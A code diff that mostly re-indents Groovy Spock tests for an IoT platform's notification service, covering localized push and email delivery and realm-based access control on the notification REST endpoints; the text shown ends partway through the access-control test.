-        and: "their language is updated to dutch"
-        def testuser1 = identityService.getIdentityProvider().getUserByUsername(MASTER_REALM, "testuser1")
-        testuser1.setAttribute(User.LOCALE_ATTRIBUTE, "nl")
-        identityService.getIdentityProvider().createUpdateUser(MASTER_REALM, testuser1, null, true)
+    and: "their language is updated to dutch"
+    def testuser1 = identityService.getIdentityProvider().getUserByUsername(MASTER_REALM, "testuser1")
+    testuser1.setAttribute(User.LOCALE_ATTRIBUTE, "nl")
+    identityService.getIdentityProvider().createUpdateUser(MASTER_REALM, testuser1, null, true)
 
-        and: "the console of the dutch user is registered"
-        def testuser1ConsoleResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, testuser1AccessToken).proxy(ConsoleResource.class)
-        def testuser1ConsoleRegistration = new ConsoleRegistration(null,
-                "Test user 1 Console",
-                "1.0",
-                "Android 7.0",
-                new HashMap<String, ConsoleProvider>(
-                        geofence: new ConsoleProvider(
-                                ORConsoleGeofenceAssetAdapter.NAME,
-                                true,
-                                false,
-                                false,
-                                false,
-                                false,
-                                null
-                        ),
-                        push: new ConsoleProvider(
-                                "fcm",
-                                true,
-                                true,
-                                true,
-                                true,
-                                false,
-                                (Map) parse("{\"token\": \"23123213ad2313b0897efd\"}").orElse(null)
-                        )
-                ),
-                "",
-                ["manager"] as String[])
-        def testuser1Console = testuser1ConsoleResource.register(null, testuser1ConsoleRegistration)
+    and: "the console of the dutch user is registered"
+    def testuser1ConsoleResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, testuser1AccessToken).proxy(ConsoleResource.class)
+    def testuser1ConsoleRegistration = new ConsoleRegistration(null,
+            "Test user 1 Console",
+            "1.0",
+            "Android 7.0",
+            new HashMap<String, ConsoleProvider>(
+                    geofence: new ConsoleProvider(
+                            ORConsoleGeofenceAssetAdapter.NAME,
+                            true,
+                            false,
+                            false,
+                            false,
+                            false,
+                            null
+                            ),
+                    push: new ConsoleProvider(
+                            "fcm",
+                            true,
+                            true,
+                            true,
+                            true,
+                            false,
+                            (Map) parse("{\"token\": \"23123213ad2313b0897efd\"}").orElse(null)
+                            )
+                    ),
+            "",
+            ["manager"] as String[])
+    def testuser1Console = testuser1ConsoleResource.register(null, testuser1ConsoleRegistration)
 
-        and: "the console is created and its token picked up by the push notification handler"
-        conditions.eventually {
-            assert testuser1Console.id != null
-            assert pushNotificationHandler.consoleFCMTokenMap.containsKey(testuser1Console.id)
-        }
+    and: "the console is created and its token picked up by the push notification handler"
+    conditions.eventually {
+      assert testuser1Console.id != null
+      assert pushNotificationHandler.consoleFCMTokenMap.containsKey(testuser1Console.id)
+    }
 
-        and: "the same notification is sent, now to both users"
-        adminNotificationResource.sendNotification(null, notification)
+    and: "the same notification is sent, now to both users"
+    adminNotificationResource.sendNotification(null, notification)
 
-        then: "both consoles in that realm should have been sent a notification"
-        conditions.eventually {
-            assert localizedNotificationIds.size() == 2
-            assert localizedNotificationTargetIds.size() == 2
-            assert pushNotificationIds.size() == 2
-            assert pushNotificationTargetIds.size() == 2
-        }
+    then: "both consoles in that realm should have been sent a notification"
+    conditions.eventually {
+      assert localizedNotificationIds.size() == 2
+      assert localizedNotificationTargetIds.size() == 2
+      assert pushNotificationIds.size() == 2
+      assert pushNotificationTargetIds.size() == 2
+    }
 
-        and: "we clear the cached notifications again"
-        localizedNotificationIds.clear()
-        localizedNotificationTargetTypes.clear()
-        localizedNotificationTargetIds.clear()
-        localizedNotificationMessages.clear()
-        pushNotificationIds.clear()
-        pushNotificationTargetTypes.clear()
-        pushNotificationTargetIds.clear()
-        pushNotificationMessages.clear()
+    and: "we clear the cached notifications again"
+    localizedNotificationIds.clear()
+    localizedNotificationTargetTypes.clear()
+    localizedNotificationTargetIds.clear()
+    localizedNotificationMessages.clear()
+    pushNotificationIds.clear()
+    pushNotificationTargetTypes.clear()
+    pushNotificationTargetIds.clear()
+    pushNotificationMessages.clear()
 
-        /* ------------ */
+    /* ------------ */
 
-        when: "testuser1 their language is updated to an unknown language, like italian"
-        testuser1.setAttribute(User.LOCALE_ATTRIBUTE, "it")
-        identityService.getIdentityProvider().createUpdateUser(MASTER_REALM, testuser1, null, true)
+    when: "testuser1 their language is updated to an unknown language, like italian"
+    testuser1.setAttribute(User.LOCALE_ATTRIBUTE, "it")
+    identityService.getIdentityProvider().createUpdateUser(MASTER_REALM, testuser1, null, true)
 
-        and: "the same notification is sent again, to both users"
-        adminNotificationResource.sendNotification(null, notification)
+    and: "the same notification is sent again, to both users"
+    adminNotificationResource.sendNotification(null, notification)
 
-        then: "testuser1 should still receive the notification, but in the default language"
-        conditions.eventually {
-            assert localizedNotificationMessages.size() == 2
-            assert pushNotificationMessages.size() == 2
-            assert pushNotificationMessages.stream().allMatch { msg -> (msg as PushNotificationMessage).title == "English title" && (msg as PushNotificationMessage).body == "English body" }
-        }
+    then: "testuser1 should still receive the notification, but in the default language"
+    conditions.eventually {
+      assert localizedNotificationMessages.size() == 2
+      assert pushNotificationMessages.size() == 2
+      assert pushNotificationMessages.stream().allMatch { msg ->
+        (msg as PushNotificationMessage).title == "English title" && (msg as PushNotificationMessage).body == "English body"
+      }
+    }
 
-        and: "we clear the cached notifications again"
-        localizedNotificationIds.clear()
-        localizedNotificationTargetTypes.clear()
-        localizedNotificationTargetIds.clear()
-        localizedNotificationMessages.clear()
-        pushNotificationIds.clear()
-        pushNotificationTargetTypes.clear()
-        pushNotificationTargetIds.clear()
-        pushNotificationMessages.clear()
+    and: "we clear the cached notifications again"
+    localizedNotificationIds.clear()
+    localizedNotificationTargetTypes.clear()
+    localizedNotificationTargetIds.clear()
+    localizedNotificationMessages.clear()
+    pushNotificationIds.clear()
+    pushNotificationTargetTypes.clear()
+    pushNotificationTargetIds.clear()
+    pushNotificationMessages.clear()
 
-        and: "testuser1 sets their language back to dutch"
-        testuser1.setAttribute(User.LOCALE_ATTRIBUTE, "nl")
-        identityService.getIdentityProvider().createUpdateUser(MASTER_REALM, testuser1, null, true)
+    and: "testuser1 sets their language back to dutch"
+    testuser1.setAttribute(User.LOCALE_ATTRIBUTE, "nl")
+    identityService.getIdentityProvider().createUpdateUser(MASTER_REALM, testuser1, null, true)
 
-        /* ----------- */
+    /* ----------- */
 
-        when: "a complex notification with different types per language is set up"
-        def complexNotification = new Notification(
-                "MultiTypeAction",
-                new LocalizedNotificationMessage(
-                        "en",
-                        new HashMap<String, AbstractNotificationMessage>(
+    when: "a complex notification with different types per language is set up"
+    def complexNotification = new Notification(
+            "MultiTypeAction",
+            new LocalizedNotificationMessage(
+                    "en",
+                    new HashMap<String, AbstractNotificationMessage>(
                             en: new PushNotificationMessage("English title", "English body", null, null, null),
                             nl: new EmailNotificationMessage().setSubject("Nederlandse titel").setText("Nederlandse tekst")
-                        )
-                ),
-                null,
-                null,
-                null)
+                            )
+                    ),
+            null,
+            null,
+            null)
 
-        complexNotification.targets = [new Notification.Target(Notification.TargetType.REALM, MASTER_REALM)]
+    complexNotification.targets = [new Notification.Target(Notification.TargetType.REALM, MASTER_REALM)]
 
-        and: "the mock email notification handler has been added"
-        List<Message> sentEmails = new CopyOnWriteArrayList<>()
-        def emailNotificationHandler = container.getService(EmailNotificationHandler.class)
-        EmailNotificationHandler mockEmailNotificationHandler = Spy(emailNotificationHandler)
-        mockEmailNotificationHandler.isValid() >> true
+    and: "the mock email notification handler has been added"
+    List<Message> sentEmails = new CopyOnWriteArrayList<>()
+    def emailNotificationHandler = container.getService(EmailNotificationHandler.class)
+    EmailNotificationHandler mockEmailNotificationHandler = Spy(emailNotificationHandler)
+    mockEmailNotificationHandler.isValid() >> true
 
-        // Log email and assume sent to SMTP Server
-        mockEmailNotificationHandler.sendMessage(_ as Message) >> {
-            Message email ->
-                sentEmails << email
-                return NotificationSendResult.success()
-        }
+    // Log email and assume sent to SMTP Server
+    mockEmailNotificationHandler.sendMessage(_ as Message) >> { Message email ->
+      sentEmails << email
+      return NotificationSendResult.success()
+    }
 
-        // Add email handler to the list of handlers
-        notificationService.notificationHandlerMap.put(emailNotificationHandler.getTypeName(), mockEmailNotificationHandler)
-        mockLocalizedNotificationHandler.notificationHandlerMap = notificationService.notificationHandlerMap
+    // Add email handler to the list of handlers
+    notificationService.notificationHandlerMap.put(emailNotificationHandler.getTypeName(), mockEmailNotificationHandler)
+    mockLocalizedNotificationHandler.notificationHandlerMap = notificationService.notificationHandlerMap
 
-        and: "testuser1 configures their email address"
-        testuser1.setEmail("testuser1@email.com")
-        identityService.getIdentityProvider().createUpdateUser(MASTER_REALM, testuser1, null, true)
+    and: "testuser1 configures their email address"
+    testuser1.setEmail("testuser1@email.com")
+    identityService.getIdentityProvider().createUpdateUser(MASTER_REALM, testuser1, null, true)
 
-        and: "the complex notification is sent"
-        adminNotificationResource.sendNotification(null, complexNotification)
+    and: "the complex notification is sent"
+    adminNotificationResource.sendNotification(null, complexNotification)
 
-        then: "it should return a BAD_REQUEST because testuser1 only gets one notification"
-        thrown(BadRequestException)
+    then: "it should return a BAD_REQUEST because testuser1 only gets one notification"
+    thrown(BadRequestException)
 
-        and: "the other notifications should be sent correctly through email and with push"
-        conditions.eventually {
-            assert localizedNotificationMessages.size() == 3
-            assert localizedNotificationTargetIds.size() == 3
-            assert pushNotificationMessages.size() == 1
-            assert sentEmails.size() == 1
-        }
+    and: "the other notifications should be sent correctly through email and with push"
+    conditions.eventually {
+      assert localizedNotificationMessages.size() == 3
+      assert localizedNotificationTargetIds.size() == 3
+      assert pushNotificationMessages.size() == 1
+      assert sentEmails.size() == 1
+    }
 
-        and: "we clear the cached notifications once again"
-        localizedNotificationIds.clear()
-        localizedNotificationTargetTypes.clear()
-        localizedNotificationTargetIds.clear()
-        localizedNotificationMessages.clear()
-        pushNotificationIds.clear()
-        pushNotificationTargetTypes.clear()
-        pushNotificationTargetIds.clear()
-        pushNotificationMessages.clear()
+    and: "we clear the cached notifications once again"
+    localizedNotificationIds.clear()
+    localizedNotificationTargetTypes.clear()
+    localizedNotificationTargetIds.clear()
+    localizedNotificationMessages.clear()
+    pushNotificationIds.clear()
+    pushNotificationTargetTypes.clear()
+    pushNotificationTargetIds.clear()
+    pushNotificationMessages.clear()
 
 
-        /* ------------ */
+    /* ------------ */
 
-        when: "an invalid notification is created"
-        def invalidNotification = new Notification(
-                "InvalidNotification",
-                new LocalizedNotificationMessage(
-                        "en",
-                        new HashMap<String, AbstractNotificationMessage>(
+    when: "an invalid notification is created"
+    def invalidNotification = new Notification(
+            "InvalidNotification",
+            new LocalizedNotificationMessage(
+                    "en",
+                    new HashMap<String, AbstractNotificationMessage>(
                             nl: new PushNotificationMessage(),
                             en: new PushNotificationMessage("English title", "English body", null, null, null)
-                        )
-                ),
-                null,
-                null,
-                null)
+                            )
+                    ),
+            null,
+            null,
+            null)
 
-        and: "the invalid notification is sent to all users"
-        adminNotificationResource.sendNotification(null, invalidNotification)
+    and: "the invalid notification is sent to all users"
+    adminNotificationResource.sendNotification(null, invalidNotification)
 
-        then: "it should return a BAD_REQUEST, because the message is invalid"
-        thrown(BadRequestException)
+    then: "it should return a BAD_REQUEST, because the message is invalid"
+    thrown(BadRequestException)
 
-        and: "all users should receive the english message"
-        conditions.eventually {
-            assert localizedNotificationMessages.size() == 0
-            assert localizedNotificationTargetIds.size() == 0
-            assert pushNotificationMessages.size() == 0
-        }
-
-
-        /* ------------------------ */
-
-        /*when: "if the notification became valid, and the TRIGGER_ASSETS placeholder is inserted"
-        ((LocalizedNotificationMessage) invalidNotification.getMessage()).setMessage("nl", new PushNotificationMessage())*/
+    and: "all users should receive the english message"
+    conditions.eventually {
+      assert localizedNotificationMessages.size() == 0
+      assert localizedNotificationTargetIds.size() == 0
+      assert pushNotificationMessages.size() == 0
     }
 
-    def "Check notification realm access control"() {
 
-        List<Message> sentEmails = new CopyOnWriteArrayList<>()
+    /* ------------------------ */
 
-        given: "the container environment is started with a mock email handler"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def notificationService = container.getService(NotificationService.class)
-        def emailNotificationHandler = container.getService(EmailNotificationHandler.class)
+    /*when: "if the notification became valid, and the TRIGGER_ASSETS placeholder is inserted"
+     ((LocalizedNotificationMessage) invalidNotification.getMessage()).setMessage("nl", new PushNotificationMessage())*/
+  }
 
-        and: "a mock email notification handler that records sent emails (so notifications get persisted without SMTP)"
-        EmailNotificationHandler mockEmailNotificationHandler = Spy(emailNotificationHandler)
-        mockEmailNotificationHandler.isValid() >> true
-        mockEmailNotificationHandler.sendMessage(_ as Message) >> {
-            Message email ->
-                sentEmails << email
-                return NotificationSendResult.success()
-        }
-        notificationService.notificationHandlerMap.put(emailNotificationHandler.getTypeName(), mockEmailNotificationHandler)
+  def "Check notification realm access control"() {
 
-        and: "the building realm and the ids of two of its users"
-        def buildingRealm = managerTestSetup.realmBuildingName
-        def testuser2Id = keycloakTestSetup.testuser2Id
-        // building user: has read:notifications and receives the realm email; testuser2: receives the email but has no read:notifications
-        def buildingUserId = keycloakTestSetup.buildingUserId
+    List<Message> sentEmails = new CopyOnWriteArrayList<>()
 
-        and: "a transient building user whose ONLY granting role is read:notifications"
-        // Created in-test (not in KeycloakTestSetup) so the shared fixture and the user-count assertions of other
-        // specs are untouched; startContainer purges users that aren't part of the fixture baseline between features.
-        def identityProvider = container.getService(ManagerIdentityService.class).getIdentityProvider()
-        def notifUserInput = new User()
-        notifUserInput.username = "notifuser"
-        notifUserInput.firstName = "Notif"
-        notifUserInput.lastName = "User"
-        notifUserInput.email = "notifuser@openremote.local"
-        notifUserInput.enabled = true
-        def notifUser = identityProvider.createUpdateUser(buildingRealm, notifUserInput, "notifuser", true)
-        identityProvider.updateUserClientRoles(buildingRealm, notifUser.id, KEYCLOAK_CLIENT_ID, READ_NOTIFICATIONS_ROLE)
-        def notifUserId = notifUser.id
+    given: "the container environment is started with a mock email handler"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def notificationService = container.getService(NotificationService.class)
+    def emailNotificationHandler = container.getService(EmailNotificationHandler.class)
 
-        and: "a transient master realm user with an email address, so a master realm notification gets persisted"
-        def masterUserInput = new User()
-        masterUserInput.username = "masternotifuser"
-        masterUserInput.firstName = "Master"
-        masterUserInput.lastName = "User"
-        masterUserInput.email = "masternotifuser@openremote.local"
-        masterUserInput.enabled = true
-        identityProvider.createUpdateUser(MASTER_REALM, masterUserInput, "masternotifuser", true)
-
-        and: "authenticated users with differing permissions"
-        def adminAccessToken = authenticate(container, MASTER_REALM, KEYCLOAK_CLIENT_ID, MASTER_REALM_ADMIN_USER, getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT))
-        def testuser2AccessToken = authenticate(container, buildingRealm, KEYCLOAK_CLIENT_ID, "testuser2", "testuser2")
-        def buildingUserAccessToken = authenticate(container, buildingRealm, KEYCLOAK_CLIENT_ID, "building", "building")
-        def notifUserAccessToken = authenticate(container, buildingRealm, KEYCLOAK_CLIENT_ID, "notifuser", "notifuser")
-        // testuser4 is a building realm admin (write:admin), i.e. it may delete but only within its own realm
-        def testuser4AccessToken = authenticate(container, buildingRealm, KEYCLOAK_CLIENT_ID, "testuser4", "testuser4")
-
-        and: "a helper that requests notifications for a realm over REST as the given user"
-        // realm is selected via the realmId query param (the consolidated endpoint has no realm path segment)
-        def requestNotificationsByRealm = { String authRealm, String token, String realmId ->
-            getClientApiTarget(serverUri(serverPort), authRealm, token)
-                    .path("notification").queryParam("realmId", realmId)
-                    .request().get()
-        }
-
-        and: "a helper that reads the notifications of a realm with a given name as the superuser"
-        def notificationsNamed = { String realmId, String name ->
-            def response = requestNotificationsByRealm(MASTER_REALM, adminAccessToken, realmId)
-            def sent = response.readEntity(SentNotification[].class).findAll { it.name == name }
-            response.close()
-            return sent
-        }
-
-        and: "helpers that delete notifications over REST as the given user"
-        def deleteNotifications = { String authRealm, String token, Map<String, Object> queryParams ->
-            def target = getClientApiTarget(serverUri(serverPort), authRealm, token).path("notification")
-            queryParams.each { name, value -> target = target.queryParam(name, value) }
-            target.request().delete()
-        }
-        def deleteNotificationById = { String authRealm, String token, Long notificationId ->
-            getClientApiTarget(serverUri(serverPort), authRealm, token)
-                    .path("notification").path(notificationId.toString())
-                    .request().delete()
-        }
-
-        when: "an email notification is sent to the entire building realm"
-        def notification = new Notification(
-                "RealmAccessTest",
-                new EmailNotificationMessage().setSubject("Realm access test").setText("Hello building"),
-                Collections.singletonList(new Notification.Target(Notification.TargetType.REALM, buildingRealm)), null, null)
-        notificationService.sendNotification(notification, Notification.Source.REALM_RULESET, buildingRealm)
-
-        then: "all three recipients' notifications are persisted correctly and a superuser can read them in full, cross-realm from master"
-        conditions.eventually {
-            assert sentEmails.size() == 3
-            def response = requestNotificationsByRealm(MASTER_REALM, adminAccessToken, buildingRealm)
-            assert response.status == 200
-            def sent = response.readEntity(SentNotification[].class).findAll { it.name == "RealmAccessTest" }
-            response.close()
-
-            // one persisted notification per email recipient, each fully populated and unredacted for the superuser
-            assert sent.size() == 3
-            assert sent.collect { it.targetId }.toSet() == [testuser2Id, buildingUserId, notifUserId].toSet()
-            assert sent.every { it.id != null }
-            assert sent.every { it.name == "RealmAccessTest" }
-            assert sent.every { it.type == EmailNotificationMessage.TYPE }
-            assert sent.every { it.target == Notification.TargetType.USER }
-            assert sent.every { it.source == Notification.Source.REALM_RULESET }
-            assert sent.every { it.sourceId == buildingRealm }
-            assert sent.every { it.realm == buildingRealm }
-            assert sent.every { it.sentOn != null && it.deliveredOn == null && it.acknowledgedOn == null && it.error == null }
-            assert sent.every { (it.message as EmailNotificationMessage).subject == "Realm access test" }
-            assert sent.every { (it.message as EmailNotificationMessage).text == "Hello building" }
-        }
-
-        when: "a user without read:notifications or read:admin requests notifications for their realm"
-        def forbiddenResponse = requestNotificationsByRealm(buildingRealm, testuser2AccessToken, buildingRealm)
-
-        then: "access is forbidden by the endpoint role check"
-        forbiddenResponse.status == 403
-        forbiddenResponse.close()
-
-        when: "a restricted user (read:notifications + read:users) requests notifications for their own realm"
-        def ownRealmResponse = requestNotificationsByRealm(buildingRealm, buildingUserAccessToken, buildingRealm)
-        def ownNotifications = ownRealmResponse.readEntity(SentNotification[].class)
-        ownRealmResponse.close()
-        def ownSent = ownNotifications.findAll { it.name == "RealmAccessTest" }
-
-        then: "a restricted user only sees the notification that targets them, with full details"
-        ownRealmResponse.status == 200
-        ownSent.size() == 1
-        ownSent[0].name == "RealmAccessTest"
-        ownSent[0].type == EmailNotificationMessage.TYPE
-        ownSent[0].target == Notification.TargetType.USER
-        ownSent[0].targetId == buildingUserId
-        ownSent[0].source == Notification.Source.REALM_RULESET
-        ownSent[0].sourceId == buildingRealm
-        ownSent[0].realm == buildingRealm
-        (ownSent[0].message as EmailNotificationMessage).subject == "Realm access test"
-        // being restricted, they don't see notifications addressed to other users in the realm
-        !ownNotifications.any { it.targetId == testuser2Id }
-        !ownNotifications.any { it.targetId == notifUserId }
-
-        when: "a non-restricted user whose only granting role is read:notifications requests their realm's notifications"
-        def notifUserResponse = requestNotificationsByRealm(buildingRealm, notifUserAccessToken, buildingRealm)
-        def notifNotifications = notifUserResponse.readEntity(SentNotification[].class)
-        notifUserResponse.close()
-        def notifSent = notifNotifications.findAll { it.name == "RealmAccessTest" }
-
-        then: "read:notifications lets a non-restricted user read ALL of the realm's notifications, but ids are sanitized without read:users/read:assets"
-        notifUserResponse.status == 200
-        // unlike the restricted user, they see every recipient's notification in the realm, not just their own
-        notifSent.size() == 3
-        notifSent.collect { it.target }.toSet() == [Notification.TargetType.USER].toSet()
-        notifSent.every { it.name == "RealmAccessTest" }
-        notifSent.every { it.type == EmailNotificationMessage.TYPE }
-        notifSent.every { it.source == Notification.Source.REALM_RULESET }
-        notifSent.every { it.realm == buildingRealm }
-        notifSent.every { (it.message as EmailNotificationMessage).subject == "Realm access test" }
-        // without read:users the recipient ids are stripped; realm ruleset source ids are realm names and stay visible
-        notifSent.every { it.targetId == null }
-        notifSent.every { it.sourceId == buildingRealm }
-
-        when: "a non-restricted building user requests notifications for the master realm they cannot access"
-        def otherRealmResponse = requestNotificationsByRealm(buildingRealm, notifUserAccessToken, MASTER_REALM)
-
-        then: "access is forbidden — even a non-restricted user cannot read another realm's notifications"
-        otherRealmResponse.status == 403
-        otherRealmResponse.close()
-
-        when: "a user with read:notifications requests notifications without specifying a realm"
-        def noRealmResponse = getClientApiTarget(serverUri(serverPort), buildingRealm, buildingUserAccessToken)
-                .path("notification")
-                .request().get()
-        def noRealmSent = noRealmResponse.readEntity(SentNotification[].class).findAll { it.name == "RealmAccessTest" }
-
-        then: "the query defaults to the caller's own realm rather than failing"
-        noRealmResponse.status == 200
-        // the restricted building user still only sees the notification targeting them
-        noRealmSent.size() == 1
-        noRealmSent[0].targetId == buildingUserId
-        noRealmResponse.close()
-
-        when: "an email notification is sent to the entire master realm"
-        def masterNotification = new Notification(
-                "MasterRealmAccessTest",
-                new EmailNotificationMessage().setSubject("Master realm test").setText("Hello master"),
-                Collections.singletonList(new Notification.Target(Notification.TargetType.REALM, MASTER_REALM)), null, null)
-        notificationService.sendNotification(masterNotification, Notification.Source.REALM_RULESET, MASTER_REALM)
-
-        then: "it is persisted against the master realm"
-        conditions.eventually {
-            assert notificationsNamed(MASTER_REALM, "MasterRealmAccessTest").size() > 0
-        }
-
-        when: "a realm admin of the building realm tries to delete the master realm's notifications"
-        def masterCount = notificationsNamed(MASTER_REALM, "MasterRealmAccessTest").size()
-        def crossRealmDelete = deleteNotifications(buildingRealm, testuser4AccessToken, [realmId: MASTER_REALM, type: EmailNotificationMessage.TYPE])
-
-        then: "the request is forbidden and the master realm's notifications are untouched"
-        crossRealmDelete.status == 403
-        crossRealmDelete.close()
-        notificationsNamed(MASTER_REALM, "MasterRealmAccessTest").size() == masterCount
-
-        when: "a realm admin of the building realm tries to delete a single master realm notification by id"
-        def masterNotificationId = notificationsNamed(MASTER_REALM, "MasterRealmAccessTest")[0].id
-        def byIdDelete = deleteNotificationById(buildingRealm, testuser4AccessToken, masterNotificationId)
-
-        then: "the request is forbidden and the notification remains"
-        byIdDelete.status == 403
-        byIdDelete.close()
-        notificationsNamed(MASTER_REALM, "MasterRealmAccessTest").any { it.id == masterNotificationId }
-
-        when: "the superuser deletes a notification that doesn't exist"
-        def missingDelete = deleteNotificationById(MASTER_REALM, adminAccessToken, Long.MAX_VALUE)
-
-        then: "the notification is reported as not found"
-        missingDelete.status == 404
-        missingDelete.close()
-
-        when: "a realm admin of the building realm deletes notifications by type without specifying a realm"
-        def ownRealmDelete = deleteNotifications(buildingRealm, testuser4AccessToken, [type: EmailNotificationMessage.TYPE])
-
-        then: "only their own realm's notifications are deleted"
-        ownRealmDelete.status == 204
-        ownRealmDelete.close()
-        notificationsNamed(buildingRealm, "RealmAccessTest").isEmpty()
-        notificationsNamed(MASTER_REALM, "MasterRealmAccessTest").size() == masterCount
-
-        when: "the superuser deletes notifications by type"
-        def superUserDelete = deleteNotifications(MASTER_REALM, adminAccessToken, [type: EmailNotificationMessage.TYPE])
-
-        then: "the delete is not confined to a realm"
-        superUserDelete.status == 204
-        superUserDelete.close()
-        notificationsNamed(MASTER_REALM, "MasterRealmAccessTest").isEmpty()
-
-        cleanup: "the mock is removed"
-        notificationService.notificationHandlerMap.put(emailNotificationHandler.getTypeName(), emailNotificationHandler)
+    and: "a mock email notification handler that records sent emails (so notifications get persisted without SMTP)"
+    EmailNotificationHandler mockEmailNotificationHandler = Spy(emailNotificationHandler)
+    mockEmailNotificationHandler.isValid() >> true
+    mockEmailNotificationHandler.sendMessage(_ as Message) >> { Message email ->
+      sentEmails << email
+      return NotificationSendResult.success()
     }
+    notificationService.notificationHandlerMap.put(emailNotificationHandler.getTypeName(), mockEmailNotificationHandler)
+
+    and: "the building realm and the ids of two of its users"
+    def buildingRealm = managerTestSetup.realmBuildingName
+    def testuser2Id = keycloakTestSetup.testuser2Id
+    // building user: has read:notifications and receives the realm email; testuser2: receives the email but has no read:notifications
+    def buildingUserId = keycloakTestSetup.buildingUserId
+
+    and: "a transient building user whose ONLY granting role is read:notifications"
+    // Created in-test (not in KeycloakTestSetup) so the shared fixture and the user-count assertions of other
+    // specs are untouched; startContainer purges users that aren't part of the fixture baseline between features.
+    def identityProvider = container.getService(ManagerIdentityService.class).getIdentityProvider()
+    def notifUserInput = new User()
+    notifUserInput.username = "notifuser"
+    notifUserInput.firstName = "Notif"
+    notifUserInput.lastName = "User"
+    notifUserInput.email = "notifuser@openremote.local"
+    notifUserInput.enabled = true
+    def notifUser = identityProvider.createUpdateUser(buildingRealm, notifUserInput, "notifuser", true)
+    identityProvider.updateUserClientRoles(buildingRealm, notifUser.id, KEYCLOAK_CLIENT_ID, READ_NOTIFICATIONS_ROLE)
+    def notifUserId = notifUser.id
+
+    and: "a transient master realm user with an email address, so a master realm notification gets persisted"
+    def masterUserInput = new User()
+    masterUserInput.username = "masternotifuser"
+    masterUserInput.firstName = "Master"
+    masterUserInput.lastName = "User"
+    masterUserInput.email = "masternotifuser@openremote.local"
+    masterUserInput.enabled = true
+    identityProvider.createUpdateUser(MASTER_REALM, masterUserInput, "masternotifuser", true)
+
+    and: "authenticated users with differing permissions"
+    def adminAccessToken = authenticate(container, MASTER_REALM, KEYCLOAK_CLIENT_ID, MASTER_REALM_ADMIN_USER, getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT))
+    def testuser2AccessToken = authenticate(container, buildingRealm, KEYCLOAK_CLIENT_ID, "testuser2", "testuser2")
+    def buildingUserAccessToken = authenticate(container, buildingRealm, KEYCLOAK_CLIENT_ID, "building", "building")
+    def notifUserAccessToken = authenticate(container, buildingRealm, KEYCLOAK_CLIENT_ID, "notifuser", "notifuser")
+    // testuser4 is a building realm admin (write:admin), i.e. it may delete but only within its own realm
+    def testuser4AccessToken = authenticate(container, buildingRealm, KEYCLOAK_CLIENT_ID, "testuser4", "testuser4")
+
+    and: "a helper that requests notifications for a realm over REST as the given user"
+    // realm is selected via the realmId query param (the consolidated endpoint has no realm path segment)
+    def requestNotificationsByRealm = { String authRealm, String token, String realmId ->
+      getClientApiTarget(serverUri(serverPort), authRealm, token)
+      .path("notification").queryParam("realmId", realmId)
+      .request().get()
+    }
+
+    and: "a helper that reads the notifications of a realm with a given name as the superuser"
+    def notificationsNamed = { String realmId, String name ->
+      def response = requestNotificationsByRealm(MASTER_REALM, adminAccessToken, realmId)
+      def sent = response.readEntity(SentNotification[].class).findAll { it.name == name }
+      response.close()
+      return sent
+    }
+
+    and: "helpers that delete notifications over REST as the given user"
+    def deleteNotifications = { String authRealm, String token, Map<String, Object> queryParams ->
+      def target = getClientApiTarget(serverUri(serverPort), authRealm, token).path("notification")
+      queryParams.each { name, value -> target = target.queryParam(name, value) }
+      target.request().delete()
+    }
+    def deleteNotificationById = { String authRealm, String token, Long notificationId ->
+      getClientApiTarget(serverUri(serverPort), authRealm, token)
+      .path("notification").path(notificationId.toString())
+      .request().delete()
+    }
+
+    when: "an email notification is sent to the entire building realm"
+    def notification = new Notification(
+            "RealmAccessTest",
+            new EmailNotificationMessage().setSubject("Realm access test").setText("Hello building"),
+            Collections.singletonList(new Notification.Target(Notification.TargetType.REALM, buildingRealm)), null, null)
+    notificationService.sendNotification(notification, Notification.Source.REALM_RULESET, buildingRealm)
+
+    then: "all three recipients' notifications are persisted correctly and a superuser can read them in full, cross-realm from master"
+    conditions.eventually {
+      assert sentEmails.size() == 3
+      def response = requestNotificationsByRealm(MASTER_REALM, adminAccessToken, buildingRealm)
+      assert response.status == 200
+      def sent = response.readEntity(SentNotification[].class).findAll {
+        it.name == "RealmAccessTest"
+      }
+      response.close()
+
+      // one persisted notification per email recipient, each fully populated and unredacted for the superuser
+      assert sent.size() == 3
+      assert sent.collect {
+        it.targetId
+      }.toSet() == [testuser2Id, buildingUserId, notifUserId].toSet()
+      assert sent.every { it.id != null }
+      assert sent.every { it.name == "RealmAccessTest" }
+      assert sent.every { it.type == EmailNotificationMessage.TYPE }
+      assert sent.every { it.target == Notification.TargetType.USER }
+      assert sent.every { it.source == Notification.Source.REALM_RULESET }
+      assert sent.every { it.sourceId == buildingRealm }
+      assert sent.every { it.realm == buildingRealm }
+      assert sent.every {
+        it.sentOn != null && it.deliveredOn == null && it.acknowledgedOn == null && it.error == null
+      }
+      assert sent.every {
+        (it.message as EmailNotificationMessage).subject == "Realm access test"
+      }
+      assert sent.every { (it.message as EmailNotificationMessage).text == "Hello building" }
+    }
+
+    when: "a user without read:notifications or read:admin requests notifications for their realm"
+    def forbiddenResponse = requestNotificationsByRealm(buildingRealm, testuser2AccessToken, buildingRealm)
+
+    then: "access is forbidden by the endpoint role check"
+    forbiddenResponse.status == 403
+    forbiddenResponse.close()
+
+    when: "a restricted user (read:notifications + read:users) requests notifications for their own realm"
+    def ownRealmResponse = requestNotificationsByRealm(buildingRealm, buildingUserAccessToken, buildingRealm)
+    def ownNotifications = ownRealmResponse.readEntity(SentNotification[].class)
+    ownRealmResponse.close()
+    def ownSent = ownNotifications.findAll { it.name == "RealmAccessTest" }
+
+    then: "a restricted user only sees the notification that targets them, with full details"
+    ownRealmResponse.status == 200
+    ownSent.size() == 1
+    ownSent[0].name == "RealmAccessTest"
